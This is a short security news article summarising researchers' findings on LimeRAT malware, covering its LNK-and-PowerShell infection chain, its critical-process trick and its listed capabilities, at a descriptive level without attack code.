loader gif

LimeRAT leverages unique infection technique to defeat traditional security mechanisms

LimeRAT leverages unique infection technique to defeat traditional security mechanisms
  • The whole infection process begins with an LNK file.
  • The malware is capable of registering itself as ‘Critical Process’ on the infected systems.

LimeRAT is a powerful Remote Administration Tool that is publicly available to any Internet user. However, lately, it has been found that cybercriminals are using a unique infection technique to spread the malicious sample without being detected by anti-virus software.

How does the infection process start - The whole infection process begins with an LNK file. It enables the attackers to download and run a PowerShell file named ‘rdp.ps1’ from a remote location. The retrieved PowerShell file is later used as a dropper in the second stage of the infection process.

“This script firstly retrieves the version of the Windows OS installed on the target machine using the “Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version” command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well-known security mechanism introduced since Vista to avoid unauthorized system configuration changes,” the Yoroi researchers wrote.

What are its capabilities - A close investigation by the researchers from Cybaze-Yoroi revealed that the malware is capable of registering itself as ‘Critical Process’ on the infected systems. And if the user tries to kill it, a Blue Screen of Death (BSoD) is displayed on the screen.

Besides this peculiar trick, the malware also includes a set of other dangerous capabilities such as:

  • USB drive propagation;
  • Infecting all files and folders on USB drives;
  • Using startup methods to evade detection;
  • Virtual machines and analysis box awareness to avoid detection;
  • Info-stealer and Crypto-stealer modules;
  • Keylogger module;
  • Backdoor and RDP access.

Upon successful installation, the malware’s command and control infrastructure abuse the Pastebin service to gain persistence on a victim’s system.

loader gif